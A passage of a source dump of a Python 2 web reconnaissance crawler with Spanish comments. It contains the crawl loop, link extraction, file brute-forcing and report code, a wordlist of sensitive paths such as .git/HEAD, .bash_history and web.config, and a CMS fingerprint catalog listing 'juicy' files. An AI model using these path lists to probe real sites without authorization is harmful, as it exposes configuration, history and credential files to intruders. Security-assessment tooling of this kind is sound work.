192 | 	def getLinks(self,code,actualpage):
193 | 		try:
194 | 			dom = lxml.html.fromstring(code)
195 | 			intlinks = []
196 | 			extlinks = []
197 | 			for linkx in dom.iterlinks():
198 | 				try:
199 | 					link = linkx[2]	# nuevo
200 | 					"""
201 | 					if self.verbose:
202 | 						print "\n****** getLinks ******"
203 | 						print "self.domain -> %s " % self.domain
204 | 						print "link -> %s " % link
205 | 						print "self.getDomain(link) -> %s " % self.getDomain(link)
206 | 						print "self.getDomain(link).startswith(self.domain) -> %s " % self.getDomain(link).startswith(self.domain)
207 | 					"""
208 | 					if self.isAbsolute(link):
209 | 						# si baseurl esta contenida en el link absoluto es un link interno
210 | 						#if self.domain in self.getDomain(link) and self.getDomain(link).startswith(self.domain):
211 | 						if self.domain in self.getDomain(link) and self.getDomain(link).startswith(self.domain):
212 | 							"""
213 | 							if self.verbose:
214 | 								print "self.getDomain(%s): %s " % (link.strip(),self.getDomain(link))
215 | 								print "link interno %s " % link.strip()
216 | 								print "adding to intlinks"
217 | 							"""
218 | 							intlinks.append(link.strip())
219 | 						else:
220 | 							ext_link = "%s#%s" % (link.strip(),actualpage)
221 | 							#if link.strip() not in self.extlinks:
222 | 							if ext_link not in self.extlinks:
223 | 								"""
224 | 								if self.verbose:
225 | 									print "link externo %s " % link.strip()
226 | 									print "adding to extlinks"
227 | 								"""
228 | 								#self.extlinks.append(link.strip())
229 | 								self.extlinks.append(ext_link)
230 | 					else:
231 | 						#if self.verbose: print 'entre a normalize con %s ' % link
232 | 						newlink = parseurls.normalize(actualpage,link)
233 | 						if self.domain in self.getDomain(newlink) and self.getDomain(newlink).startswith(self.domain):
234 | 							"""
235 | 							if self.verbose:
236 | 								print "link relativo %s " % newlink
237 | 								print "adding to intlinks"
238 | 							"""
239 | 							intlinks.append(newlink)
240 | 						else:
241 | 							"""
242 | 							if self.verbose:
243 | 								print "link relativo %s " % newlink
244 | 								print "adding to extlinks"
245 | 							"""
246 | 							ext_link = "%s#%s" % (newlink,actualpage)
247 | 							#print 'tmp es %s' % tmp
248 | 							if ext_link not in self.extlinks:
249 | 								self.extlinks.append(ext_link)
250 | 								#print self.extlinks
251 | 				except Exception as e:
252 | 					print "error @getLinks"
253 | 					print e
254 | 			# Aqui debo hacer el bruteforce de links
255 | 			if self.bruteforce == True:
256 | 				bres = self.bruteForce(actualpage)
257 | 				if bres is not None: intlinks.extend(bres)
258 | 			return (intlinks,extlinks)
259 | 		except:
260 | 			return ([],[])
261 | 		
262 | 	def addLinks(self,intlinks,nivel,pnode):
263 | 		for actlink in intlinks:
264 | 			# si los links encontrados no han sido visitados ni estan por, lo agrego
265 | 			actlink = self.fixUrl(actlink)
266 | 			if actlink is not None:
267 | 				actlink = parseurls.removeExtraSlashes(actlink)
268 | 				toexclude = False
269 | 				for ex in self.exclude:
270 | 					if ex in actlink:
271 | 						toexclude = True
272 | 				if not self.visited.has_key(actlink) and not self.tovisit.has_key(actlink) and not toexclude:
273 | 					self.tovisit[actlink]=nodoresultado(actlink,pnode.getUrl(),nivel+1,pnode)
274 | 					#print('DEBUG: ClassyCrawler : ',self.tovisit[actlink])
275 | 					self.puntuacion = self.puntuacion + 1
276 | 	
277 | 	# Set additional start links, this will be queued in tovisit
278 | 	def setStartLinks(self,links):
279 | 		new_links = []
280 | 		for link in links:
281 | 			if self.isAbsolute(link):
282 | 				# si baseurl esta contenida en el link absoluto es un link interno
283 | 				if self.domain in self.getDomain(link) and self.getDomain(link).startswith(self.domain):
284 | 						new_links.append(link.strip())
285 | 			else:
286 | 				#if self.verbose: print 'entre a normalize con %s ' % link
287 | 				# get full domain
288 | 				full_domain = parseurls.getDomain(self.url)
289 | 				newlink = '%s/%s' % (full_domain,link)
290 | 				newlink = parseurls.normalize('',newlink)
291 | 				new_links.append(newlink)
292 | 		self.startlinks = new_links
293 | 		
294 | 	def crawl(self):
295 | 		startpage = self.url
296 | 		externallinks = []
297 | 		# para que es la i ?
298 | 		i = 0
299 | 		# lista de archivos encontrados
300 | 		self.visited=collections.OrderedDict()
301 | 		self.tovisit = collections.OrderedDict()
302 | 		
303 | 		# aqui se define el parent node
304 | 		self.tovisit[startpage.strip()] = nodoresultado(startpage.strip(),'',0)
305 | 		# quick patch for adding the startup links
306 | 		node_res = self.tovisit[startpage.strip()]
307 | 		# agrego los starlinks como nodo padre el inicial
308 | 		self.addLinks(self.startlinks,1,node_res)
309 | 
310 | 		while len(self.tovisit)>0 and len(self.visited) < self.maxfiles:
311 | 			if self.verbose:
312 | 				if self.color:
313 | 					try:
314 | 						print (Fore.GREEN+"\nVisited elems: "+Fore.BLUE+len(self.visited)+Style.RESET_ALL)
315 | 					except:
316 | 						print "Visited elems: ",len(self.visited)
317 | 				else:
318 | 					print "Visited elems: ",len(self.visited)
319 | 			# 'url':nodores
320 | 			elem = self.tovisit.items()[0][1]
321 | 			actualpage = elem.getUrl()
322 | 			nivel = elem.getNivel()
323 | 			# elimino el elemento de tovisit
324 | 			del self.tovisit[actualpage]
325 | 			if self.color:
326 | 				try:
327 | 					print (Fore.GREEN+"\nRecurso: "+Fore.BLUE+actualpage+Style.RESET_ALL)
328 | 					print (Fore.GREEN+"Current level: "+Fore.BLUE+str(nivel)+Style.RESET_ALL)
329 | 					print (Fore.GREEN+"Remaining elems: "+Fore.BLUE+str(len(self.tovisit))+Style.RESET_ALL)
330 | 				except:
331 | 					print "\nRecurso: ",actualpage			
332 | 					print 'current level: ',nivel
333 | 					print 'remaining elements: ',len(self.tovisit)
334 | 			else:
335 | 				print "\nRecurso: ",actualpage			
336 | 				print 'current level: ',nivel
337 | 				print 'remaining elements: ',len(self.tovisit)
338 | 			# Hacemos el delay
339 | 			time.sleep(self.delay)
340 | 			# Hago una peticion head
341 | 			actreq = self.req.getHeadRequest(actualpage)
342 | 			#print('DEBUG: ClassyCrawler : actreq')
343 | 			#print('DEBUG: ClassyCrawler : actreq' , actreq)
344 | 			# Determino si es un recurso html (con los headers)
345 | 			status = self.isHTML(actreq)
346 | 			#print 'Status %s ' % status
347 | 			self.visited[actualpage]=elem
348 | 			#print('DEBUG: status ',status)
349 | 			#print('DEBUG: ',type(status))
350 | 			if status is not None and status[0] == True:
351 | 				# Analizo por posibles vulnerabilidades en el recurso
352 | 				self.vulndetector.fromFilename(actualpage)
353 | 				# Analiza los headers del recurso para hacer fingerprint
354 | 				self.swdetector.fromHeaders(actreq.headers,actualpage)
355 | 				try: elem.setStatus(actreq.status_code)
356 | 				except Exception as e:	# error en el servidor
357 | 					status[1] = 500
358 | 				# Obtenemos el codigo fuente si es un codigo < 400 
359 | 				if status[1] < 400:
360 | 					try: 
361 | 						actualcode = self.req.getHTMLCode(actualpage).text
362 | 					except Exception as e:
363 | 						print('crawler@crawl problem with %s' % actualpage)
364 | 						print(e) 
365 | 						actualcode = None
366 | 					if actualcode is not None:
367 | 						# detecto elemetos del codigo fuente
368 | 						self.swdetector.fromCode(actualcode,actualpage)
369 | 						# Obtengo los links internos y externos del codigo
370 | 						# Debo pasar la url de este nodo, para que sus links
371 | 						# hijos relativos lo tengan
372 | 						links = self.getLinks(actualcode,actualpage)
373 | 						intlinks = links[0]
374 | 						# agrego los links al recurso
375 | 						elem.setLinks(intlinks)
376 | 						# obtengo los formularios
377 | 						formularios = self.getForms(actualcode)
378 | 						elem.setForms(formularios)
379 | 						# agrego este recurso a la lista de recursos visitados
380 | 						self.visitedresources.append(elem)
381 | 						if elem.hasForms() == True: print "Tiene formularios"
382 | 						# Verifico si hay listado habilitado
383 | 						dirlisting = self.directoryListing(actualpage)
384 | 						if dirlisting:
385 | 							print "Directory listing enabled"
386 | 							actualdir = self.getPreffix(actualpage)
387 | 							if self.verbose:
388 | 								print 'dir found ',actualdir
389 | 							if actualdir not in self.directories:
390 | 								self.directories.append(actualdir)
391 | 								intlinks.append(actualdir)
392 | 						# bruteforce
393 | 						if self.backups:
394 | 							# el padre de estos nodos debe ser el actual o el padre(actual)?
395 | 							bkplinks = self.bforcer.thisFile(actualpage)
396 | 							if len(bkplinks)>0:
397 | 								self.addLinks(bkplinks,nivel,elem)
398 | 						if self.bruteforce:
399 | 							blinks = self.bruteForce(actualpage)
400 | 							if blinks is not None and len(blinks) > 0:
401 | 								if nivel+1 < self.depth:
402 | 									self.addLinks(blinks,nivel,elem)
403 | 						# Si el nivel siguiente no es el limite los agregamos
404 | 						if nivel+1 < self.depth: 
405 | 							self.addLinks(intlinks,nivel,elem)
406 | 					else:
407 | 						print "Something wrong with ",actualpage
408 | 				# encontre un 400 o 500
409 | 				else:
410 | 						print "Broken link: ",actualpage
411 | 						if actualpage not in self.flist:
412 | 							self.brokenlist.append(actualpage)
413 | 						self.swdetector.fromFilename(actualpage)
414 | 			else:
415 | 				print "File found: ",actualpage
416 | 				# Detect from filename
417 | 				print "Detecting from filename -> ",actualpage
418 | 				self.swdetector.fromFilename(actualpage)
419 | 				self.flist.append(elem)
420 | 				# optimizar
421 | 				dirlisting = self.directoryListing(actualpage)
422 | 				if dirlisting:
423 | 						print "Directory Listing enabled" 
424 | 						if self.verbose:
425 | 							print 'current level ',nivel
426 | 						actualdir = self.getPreffix(actualpage)
427 | 						if actualdir not in self.directories:
428 | 							self.directories.append(actualdir)	
429 | 							if nivel+1 < self.depth: 
430 | 								self.addLinks([actualdir],nivel,elem)
431 | 				if self.backups:
432 | 					# el padre de estos nodos debe ser el actual o el padre(actual)?
433 | 					bkplinks = self.bforcer.thisFile(actualpage)
434 | 					if bkplinks is not None and len(bkplinks)>0:
435 | 						self.addLinks(bkplinks,nivel,elem)
436 | 				if self.bruteforce == True:
437 | 					blinks = self.bruteForce(actualpage)
438 | 					if blinks is not None and len(blinks) > 0:
439 | 						if nivel+1 < self.depth:
440 | 							self.addLinks(blinks,nivel,elem)
441 | 		####################### FIN CRAWLING ###########################
442 | 		
443 | 		
444 | 		####################### IMPRESION CONSOLA ######################
445 | 		####################### Recursos ###############################
446 | 		if self.color:
447 | 			try: print (Fore.BLUE+"\n"+"*"*100+"\nResources\n"+"*"*100+"\n"+Style.RESET_ALL)				
448 | 			except: print "*"*100+"\nResources\n","*"*100,"\n"
449 | 		else:
450 | 			print "*"*100+"\nResources\n","*"*100,"\n"
451 | 		for res in self.visitedresources:
452 | 			print "Url: ",res.url
453 | 			if res.hasForms() == True:
454 | 				for fx in res.getForms(): 
455 | 					if fx.action is not None:
456 | 						print '\tForm: ',fx.action
457 | 		####################### Links rotos ###############################
458 | 		if len(self.brokenlist)>0:
459 | 			if self.color:
460 | 				try: print (Fore.BLUE+"\nBroken Links: \n"+Style.RESET_ALL+"\n".join(self.brokenlist))
461 | 				except: print "\nBroken Links: \n","\n".join(self.brokenlist)
462 | 			else:
463 | 				print "\nBroken Links: \n","\n".join(self.brokenlist)
464 | 		####################### Files found ###############################
465 | 		if len(self.flist)>0:
466 | 			if self.color:
467 | 				try:print (Fore.BLUE+"\nFiles found: \n"+Style.RESET_ALL)
468 | 				except: print "\nFiles found:\n"
469 | 			else:
470 | 				print "\nFiles found:\n"
471 | 			for f in self.flist:
472 | 				print f.getUrl()
473 | 
474 | 		####################### Bruteforced files #######################
475 | 		if len(self.bforcer.found_resources) > 0:
476 | 			if self.color:
477 | 				try: print (Fore.BLUE+"\nBruteforced files: \n"+Style.RESET_ALL+"\n".join(self.bforcer.found_resources))
478 | 				except: print "\nBruteforced files: \n","\n".join(self.bforcer.found_resources)
479 | 			else:
480 | 				print "\nBruteforced files: \n","\n".join(self.bforcer.found_resources)
481 | 		####################### Ext Links ###############################
482 | 		if len(self.extlinks)>0:
483 | 			if self.color:
484 | 				try: print (Fore.BLUE+"\nExternal links: \n"+Style.RESET_ALL+"\n".join(self.extlinks))
485 | 				except: print "\nExternal links:\n","\n".join(self.extlinks)
486 | 			else:
487 | 				print "\nExternal links:\n","\n".join(self.extlinks)
488 | 		####################### DirListing ###############################
489 | 		if len(self.directories)>0:
490 | 			if self.color:
491 | 				try: print (Fore.BLUE+"\nDir Listing: \n"+Style.RESET_ALL+"\n".join(sorted(set(self.directories))))
492 | 				except: print "\nDirectory Listing:\n","\n".join(sorted(set(self.directories)))
493 | 			else:
494 | 				print "\nDirectory Listing:\n","\n".join(sorted(set(self.directories)))
495 | 		####################### Raiz ##################################
496 | 		try: nraiz = self.visitedresources[0]
497 | 		except Exception as e: print "no visited elements: %s " % e
498 | 		####################### Resultados modulos #####################
499 | 		for res in self.swdetector.results():
500 | 			if self.color:
501 | 				try: print (Fore.BLUE+res[0]+"\n"+Style.RESET_ALL+"\n".join(res[1:]))
502 | 				except: print '\n','\n'.join(res)
503 | 			else:
504 | 				print '\n','\n'.join(res)
505 | 		####################### POST DETECTION #######################
506 | 		self.swdetector.postCrawling()
507 | 		##################### ExtResults I ########################
508 | 		extresults = []
509 | 		if self.runexternaltools:
510 | 			# obtenemos los resultados de las herramientas externas
511 | 			print "running external tools"
512 | 			extresults = self.swdetector.runExtTools()
513 | 		######################### PUNTUACION ##########################
514 | 		self.puntuacion+= len(self.directories)
515 | 		self.puntuacion+= self.swdetector.getPuntuation()
516 | 		######################### PRIORIDAD ###########################
517 | 		priority = self.getPriority()
518 | 		#print priority
519 | 		###############################################################
520 | 		###########			INICIO DE REPORTES  ###########
521 | 		###############################################################
522 | 		# ESTADISTICAS
523 | 		estadisticas = ['Puntuation: '+str(self.puntuacion),
524 | 						'Priority: ',str(priority).rstrip(),
525 | 						'Resources: '+str(len(self.visitedresources)),
526 | 						'Broken Links: '+str(len(self.brokenlist)),
527 | 						'Files found: '+str(len(self.flist)).rstrip(),
528 | 						'External links: '+str(len(self.extlinks)),
529 | 						'Directory listing: '+str(len(self.directories))]
530 | 		# Lista para los resultados de los modulos de deteccion
531 | 		detectionres = [] 
532 | 		for res in self.swdetector.results():
533 | 			# Tomo los resultados del detector
534 | 			tmp = res
535 | 			detectionres.append(tmp)
536 | 			# Agrego las detecciones para las estadisticas
537 | 			estadisticas.append(tmp[0]+': '+str(len(tmp[1:])))
538 | 		self.reportex.fromList(['statistics']+estadisticas)
539 | 		######################### DETALLES #############################
540 | 		if len(self.directories) > 0:
541 | 			self.reportex.fromList(['directory listing']+sorted(self.directories),True)
542 | 		##########################Files#################################
543 | 		filelist = []
544 | 		for f in self.flist: filelist.append(f.getUrl())
545 | 		if len(filelist)>0:
546 | 			self.reportex.fromList(['files']+sorted(filelist),True)
547 | 		if len(self.bforcer.found_resources) > 0:
548 | 			self.reportex.fromList(['Bruteforced files']+sorted(self.bforcer.found_resources),True)
549 | 		if len(self.brokenlist)>0:
550 | 			self.reportex.fromList(['broken links']+sorted(self.brokenlist))
551 | 		if len(self.extlinks)>0:
552 | 			self.reportex.fromList(['external links']+sorted(self.extlinks),True)
553 | 		# Genera los reportes para los hallazgos de los modulos de deteccion
554 | 		for detected in detectionres:
555 | 			self.reportex.fromList(detected)
556 | 			#print "\nDEBUG\n".join(detected)
557 | 		###################### RESOURCES ########################
558 | 		self.reportex.fromResources(self.visitedresources)
559 | 		print "\nPuntuacion: ",self.puntuacion
560 | 		###########################Formularios##########################
561 | 		unida = parseurls.getDomain(self.url)
562 | 		if self.url.endswith('/'): unida+='/'
563 | 		listforms = [] 	# unique forms
564 | 		addedforms = []	# forms to report
565 | 		for res in self.visitedresources:
566 | 			actresurl = res.getUrl()
567 | 			if res.hasForms():
568 | 				for f in res.getForms():
569 | 					actaction = f.getAction()
570 | 					actpath = parseurls.normalize(actresurl,actaction)
571 | 					f.setPath(actpath)
572 | 					if actpath not in addedforms:
573 | 						addedforms.append(actpath)
574 | 						listforms.append(f)
575 | 		#listforms es una lista de objetos formulario
576 | 		if self.color:
577 | 			try: print (Fore.BLUE+'FORMS'+Style.RESET_ALL)
578 | 			except: print '\n','*'*40,'FORMS','*'*40
579 | 		else:
580 | 			print '\n','*'*40,'FORMS','*'*40
581 | 		for form in listforms: print form
582 | 		if len(listforms)> 0:
583 | 			self.reportex.fromForms(listforms)
584 | 		#################### VULNERABILITIES ###########################
585 | 		vulnres = []
586 | 		for res in self.vulndetector.results():
587 | 			# Tomo los resultados del detector
588 | 			tmp = res
589 | 			#print 'DEBUG VULN \n',tmp
590 | 			vulnres.append(tmp)
591 | 		for detected in vulnres:
592 | 			#print 'DEBUG DETECTED\n',detected
593 | 			self.reportex.fromList(detected)
594 | 		#################### REPORT EXTRESULTS #########################
595 | 		if self.color:
596 | 			try: print (Fore.BLUE+"External Results"+Style.RESET_ALL)
597 | 			except: print "External Results"
598 | 		else:
599 | 			print "External Results"
600 | 		for extres in extresults: 
601 | 			print extres
602 | 			# Si es un resultado externo, ahref = False, Extres=True
603 | 			self.reportex.fromList(extres.splitlines(),False,True)
604 | 		###################GENERACION XML Y SITEMAP####################
605 | 		# sitemap
606 | 		#smapobj = test.parseResources(self.domain,unida,self.visitedresources+self.flist,listforms)
607 | 		smapobj = site_mapper.parseResources(self.domain,unida,self.visitedresources+self.flist,listforms)
608 | 		#print('pase parseResources')
609 | 		#print '\n'.join(smap2[0])
610 | 		print '\n'.join(smapobj.getMap()) # sitemap[0] = sitemap,ligas
611 | 		#print('pase getMap')
612 | 		self.reportex.sitemap(smapobj)
613 | 		#print('pase siteMap')
614 | 		self.reportex.sitemapXML(smapobj)
615 | 		#print('pase siteMapXML')
616 | 		################################################################
617 | 		############			FIN DE REPORTES		########
618 | 		################################################################
619 | 


--------------------------------------------------------------------------------
/crawler/ClassyCrawler.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/crawler/ClassyCrawler.pyc


--------------------------------------------------------------------------------
/crawler/__init__.py:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/crawler/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/crawler/__init__.pyc


--------------------------------------------------------------------------------
/data/bruteforce_list.txt:
--------------------------------------------------------------------------------
 1 | CHANGELOG.txt
 2 | phpinfo.php
 3 | .git/HEAD
 4 | phpmyadmin
 5 | .svn
 6 | config
 7 | _notes/dwsync.xml
 8 | sitemap.xml
 9 | access_log
10 | web.config
11 | laravel.log
12 | server.cfg
13 | main.yaml
14 | usage/index.html
15 | .bash_history
16 | _layouts/settings
17 | 


--------------------------------------------------------------------------------
/data/data.xml:
--------------------------------------------------------------------------------
  1 | <softwarecatalog>
  2 | 	<software name="wordpress">
  3 | 		<headers>
  4 | 			wordpress
  5 | 		</headers>
  6 | 		<wordpatterns>
  7 | 			name=\"generator\"\s*content=\"(Wordpress.*)\"\s*/>,wp-includes
  8 | 		</wordpatterns>
  9 | 		<files>
 10 | 			wp-settings.php,
 11 | 			wp-login.php,
 12 | 			wp-content,
 13 | 			wlwmanifest.xml,
 14 | 			wp-cron.php
 15 | 		</files>
 16 | 		<directories>
 17 | 			wp-admin/,
 18 | 			wp-content/,
 19 | 			wp-includes/
 20 | 		</directories>
 21 | 		<juicyfiles>
 22 | 			index.php,
 23 | 			wp-activate.php,
 24 | 			wp-comments-post.php,
 25 | 			wp-config-sample.php,
 26 | 			wp-links-opml.php,
 27 | 			wp-load.php,
 28 | 			wp-mail.php,
 29 | 			wp-settings.php,
 30 | 			wp-signup.php,
 31 | 			wp-trackback.php,
 32 | 			xmlrpc.php,
 33 | 			readme.html,
 34 | 			license.txt
 35 | 		</juicyfiles>
 36 | 		<themes>
 37 | 			/wp-content/themes/twentyfifteen/rtl.css,
 38 | 			/wp-content/themes/twentyseventeen/rtl.css,
 39 | 			/wp-content/themes/twentysixteen/rtl.css,
 40 | 			/wp-content/themes/valkano/rtl.css,
 41 | 			/wp-content/themes/hestia/rtl.css,
 42 | 			/wp-content/themes/twentyfourteen/rtl.css,
 43 | 			/wp-content/themes/storefront/rtl.css,
 44 | 			/wp-content/themes/fagri/rtl.css,
 45 | 			/wp-content/themes/customizr/rtl.css,
 46 | 			/wp-content/themes/hueman/rtl.css,
 47 | 			/wp-content/themes/rarabusiness/rtl.css,
 48 | 			/wp-content/themes/travelagency/rtl.css,
 49 | 			/wp-content/themes/square/rtl.css,
 50 | 			/wp-content/themes/educationzone/rtl.css,
 51 | 			/wp-content/themes/lawyerlandingpage/rtl.css,
 52 | 			/wp-content/themes/oceanwp/rtl.css,
 53 | 			/wp-content/themes/astra/rtl.css,
 54 | 			/wp-content/themes/sydney/rtl.css,
 55 | 			/wp-content/themes/bulk/rtl.css,
 56 | 			/wp-content/themes/customify/rtl.css,
 57 | 			/wp-content/themes/mesmerize/rtl.css,
 58 | 			/wp-content/themes/shapely/rtl.css,
 59 | 			/wp-content/themes/ashe/rtl.css,
 60 | 			/wp-content/themes/total/rtl.css,
 61 | 			/wp-content/themes/zeriflite/rtl.css,
 62 | 			/wp-content/themes/orfeo/rtl.css
 63 | 		</themes>
 64 | 		<postcrawl>
 65 | 			True
 66 | 		</postcrawl>
 67 | 	</software>	
 68 | 	<software name="drupal">
 69 | 		<headers>
 70 | 			drupal
 71 | 		</headers>
 72 | 		<wordpatterns>
 73 | 			name=\"generator\"\s*content=\"(Drupal.*)\"\s*/>,
 74 | 			name=\"generator\"\s*content=\"Drupal.*\"/?>
 75 | 			data-drupal-selector,
 76 | 			data-drupal-link
 77 | 		</wordpatterns>
 78 | 		<files>
 79 | 			drupal-config,
 80 | 			drupal-admin,
 81 | 			sites/default/files/,
 82 | 			/modules/comment/,
 83 | 			/modules/field/theme/,
 84 | 			/modules/node/,
 85 | 			/modules/search/,
 86 | 			/modules/system/,
 87 | 			/modules/user/
 88 | 		</files>
 89 | 		<directories>
 90 | 			sites/all/,
 91 | 			misc/,
 92 | 			sites/default/,
 93 | 			includes/,
 94 | 			modules/,
 95 | 			profiles/,
 96 | 			/modules/comment/,
 97 | 			/modules/field/theme/,
 98 | 			/modules/node/,
 99 | 			/modules/search/,
100 | 			/modules/user/,
101 | 			/modules/system/,
102 | 			/modules/user/
103 | 		</directories>
104 | 		<juicyfiles>
105 | 			README.txt,
106 | 			autoload.php,
107 | 			composer.json,
108 | 			composer.lock,
109 | 			example.gitignore,
110 | 			robots.txt,
111 | 			web.config,
112 | 			CHANGELOG.txt,
113 | 			composer.json,
114 | 			core.libraries.yml,
115 | 			core.link_relation_types.yml,
116 | 			core.services.yml,
117 | 			package.json,
118 | 			phpcs.xml.dist,
119 | 			phpunit.xml.dist,
120 | 			.gitignore,
121 | 			.htaccess
122 | 		</juicyfiles>
123 | 		<themes>
124 | 			themes/bartik/screenshot.png,
125 | 			themes/garland/screenshot.png,
126 | 			themes/seven/screenshot.png,
127 | 			themes/stark/screenshot.png,
128 | 			themes/bootstrap/screenshot.png,
129 | 			themes/zen/screenshot.png,
130 | 			themes/adminimal-responsiveadministrationtheme/screenshot.png,
131 | 			themes/omega/screenshot.png,
132 | 			themes/adaptivetheme/screenshot.png,
133 | 			themes/tao/screenshot.png,
134 | 			themes/rubik/screenshot.png,
135 | 			themes/corporateclean/screenshot.png,
136 | 			themes/shiny(administrationtheme)/screenshot.png,
137 | 			themes/danland/screenshot.png,
138 | 			themes/mayo/screenshot.png,
139 | 			themes/business/screenshot.png,
140 | 			themes/nexustheme/screenshot.png,
141 | 			themes/responsivebartikd7/screenshot.png,
142 | 			themes/skeleton/screenshot.png,
143 | 			themes/zurbfoundation/screenshot.png,
144 | 			themes/corolla/screenshot.png,
145 | 			themes/pixturereloaded/screenshot.png,
146 | 			themes/professionaltheme/screenshot.png,
147 | 			themes/bluemasters/screenshot.png,
148 | 			themes/bootstrapbusiness/screenshot.png,
149 | 			themes/fusion/screenshot.png,
150 | 			themes/radix/screenshot.png,
151 | 			themes/zeropoint/screenshot.png,
152 | 			themes/mothership/screenshot.png,
153 | 			themes/omegakickstart/screenshot.png
154 | 		</themes>
155 | 		<postcrawl>
156 | 			True
157 | 		</postcrawl>
158 | 	</software>
159 | 	<software name="joomla">
160 | 		<headers>
161 | 			Joomla
162 | 		</headers>
163 | 		<wordpatterns>
164 | 			name=\"generator\"\s*content=\"(Joomla.*)\"\s*/>
165 | 		</wordpatterns>
166 | 		<files>
167 | 			/administrator/cache,
168 | 			/administrator/components,
169 | 			/administrator/language,
170 | 			/administrator/manifests,
171 | 			/administrator/modules,
172 | 			/administrator/templates,
173 | 			/cache/index.html,
174 | 			/components/index.html,
175 | 			/language/en-GB,
176 | 			/layouts/index.html,
177 | 			/layouts/joomla,
178 | 			/layouts/libraries,
179 | 			/layouts/plugins,
180 | 			/libraries/cms,
181 | 			/libraries/fof,
182 | 			/libraries/idna_convert,
183 | 			/libraries/joomla,
184 | 			/libraries/vendor,
185 | 			/media/com_contenthistory,
186 | 			/media/jui,
187 | 			/media/media,
188 | 			/media/system,
189 | 			/plugins/content,
190 | 			/plugins/editors,
191 | 			/plugins/finder,
192 | 			/plugins/search,
193 | 			/plugins/system,
194 | 			/plugins/user,
195 | 			/templates/,
196 | 			/templates/system
197 | 		</files>
198 | 		<directories>
199 | 			/administrator/cache,
200 | 			/administrator/components,
201 | 			/administrator/language,
202 | 			/administrator/manifests,
203 | 			/administrator/modules,
204 | 			/administrator/templates,
205 | 			/cache/index.html,
206 | 			/components/index.html,
207 | 			/language/en-GB,
208 | 			/layouts/index.html,
209 | 			/layouts/joomla,
210 | 			/layouts/libraries,
211 | 			/layouts/plugins,
212 | 			/libraries/cms,
213 | 			/libraries/fof,
214 | 			/libraries/idna_convert,
215 | 			/libraries/joomla,
216 | 			/libraries/vendor,
217 | 			/media/com_contenthistory,
218 | 			/media/jui,
219 | 			/media/media,
220 | 			/media/system,
221 | 			/plugins/content,
222 | 			/plugins/editors,
223 | 			/plugins/finder,
224 | 			/plugins/search,
225 | 			/plugins/system,
226 | 			/plugins/user,
227 | 			/templates/,
228 | 			/templates/system
229 | 		</directories>
230 | 		<juicyfiles>
231 | 			/web.config.txt,
232 | 			/web.config,
233 | 			/administrator/components/com_admin/admin.xml,
234 | 			/administrator/logs/index.html
235 | 		</juicyfiles>
236 | 		<themes>
237 | 			/templates/beez3/template_preview.png,
238 | 			/templates/protostar/template_preview.png,
239 | 			/templates/system/template_preview.png
240 | 		</themes>
241 | 		<postcrawl>
242 | 			True
243 | 		</postcrawl>
244 | 	</software>	
245 | 	<software name="moodle">
246 | 		<headers>
247 | 			MoodleSession,
248 | 			moodle
249 | 		</headers>
250 | 		<wordpatterns>
251 | 			name=\"generator\"\s*content=\"(Moodle.*)\"\s*/>,
252 | 			name=\"keywords\"\s*content=\"(Moodle.*)\"\s*/>,moodle-core
253 | 		</wordpatterns>
254 | 		<files>
255 | 			moodledata,
256 | 			my_moodle_themes
257 | 		</files>
258 | 		<directories>
259 | 			admin/,
260 | 			analytics/,
261 | 			auth/,
262 | 			availability/,
263 | 			backup/,
264 | 			badges/,
265 | 			blocks/,
266 | 			blog/,
267 | 			cache/,
268 | 			calendar/,
269 | 			cohort/,
270 | 			comment/,
271 | 			competency/,
272 | 			completion/,
273 | 			course/,
274 | 			dataformat/,
275 | 			enrol/,
276 | 			error/,
277 | 			files/,
278 | 			filter/,
279 | 			grade/,
280 | 			group/,
281 | 			install/,
282 | 			iplookup/,
283 | 			lang/,
284 | 			lib/,
285 | 			local/,
286 | 			login/,
287 | 			media/,
288 | 			message/,
289 | 			mnet/,
290 | 			mod/,
291 | 			my/,
292 | 			notes/,
293 | 			pix/,
294 | 			plagiarism/,
295 | 			portfolio/,
296 | 			question/,
297 | 			rating/,
298 | 			report/,
299 | 			repository/,
300 | 			rss/,
301 | 			search/,
302 | 			struct/,
303 | 			tag/,
304 | 			theme/,
305 | 			user/,
306 | 			userpix/,
307 | 			webservice/
308 | 		</directories>
309 | 		<juicyfiles>
310 | 			Gruntfile.js,
311 | 			behat.yml.dist,
312 | 			composer.lock,
313 | 			npm-shrinkwrap.json,
314 | 			package.json,
315 | 			phpunit.xml.dist,
316 | 			struct,
317 | 			admin/environment.xml,
318 | 			admin/roles/role_schema.xml,
319 | 			/lib/upgrade.txt
320 | 		</juicyfiles>
321 | 		<themes>
322 | 			/theme/serenity/config.php,
323 | 			/theme/sky_high/config.php,
324 | 			/theme/brick/config.php,
325 | 			/theme/canvas/config.php,
326 | 			/theme/nonzero/config.php,
327 | 			/theme/splash/config.php,
328 | 			/theme/fusion/config.php,
329 | 			/theme/arialist/config.php,
330 | 			/theme/overlay/config.php,
331 | 			/theme/binarius/config.php,
332 | 			/theme/magazine/config.php,
333 | 			/theme/formfactor/config.php,
334 | 			/theme/standard/config.php,
335 | 			/theme/formal_white/config.php,
336 | 			/theme/anomaly/config.php,
337 | 			/theme/boxxie/config.php,
338 | 			/theme/leatherbound/config.php,
339 | 			/theme/base/config.php,
340 | 			/theme/standardold/config.php
341 | 		</themes>
342 | 		<postcrawl>
343 | 			True
344 | 		</postcrawl>
345 | 	</software>
346 | 	<software name="ojs">
347 | 		<headers>
348 | 			ojs
349 | 		</headers>
350 | 		<wordpatterns>
351 | 			name=\"generator\"\s*content=\"(Open Journal Systems.*)\"\s*/>,
352 | 			id=\"developedBy\">Open Journal Systems,
353 | 			class=\"current\">Open Journal Systems
354 | 		</wordpatterns>
355 | 		<files>ojs</files>
356 | 		<directories>
357 | 			api/,
358 | 			cache/,
359 | 			classes/,
360 | 			controllers/,
361 | 			dbscripts/,
362 | 			docs/,
363 | 			js/,
364 | 			lib/,
365 | 			locale/,
366 | 			pages/,
367 | 			plugins/,
368 | 			public/,
369 | 			registry/,
370 | 			styles/,
371 | 			templates/
372 | 		</directories>
373 | 		<juicyfiles>
374 | 			config.TEMPLATE.inc.php,
375 | 			favicon.ico,
376 | 			robots.txt,
377 | 			tools/xmllint-exclusions.txt,
378 | 			/lib/pkp/libraries.txt
379 | 		</juicyfiles>
